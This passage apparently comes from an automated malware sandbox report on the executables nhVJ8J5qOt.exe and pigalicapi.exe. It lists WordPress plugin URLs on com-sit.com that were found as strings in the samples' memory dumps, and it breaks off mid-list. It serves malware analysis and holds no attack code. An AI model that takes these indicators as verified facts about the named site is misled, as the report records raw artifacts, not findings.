00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.13.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.13.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.13.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.10
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-blocks/assets/js/jet-blocks.min.js?ver=1.3.6
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/css/jet-elements-skin.css?ver=2.6.10
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/css/jet-elements.css?ver=2.6.10
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/js/jet-elements.min.js?ver=2.6.10
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/js/lib/slick/slick.min.js?ver=1.8.1
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, 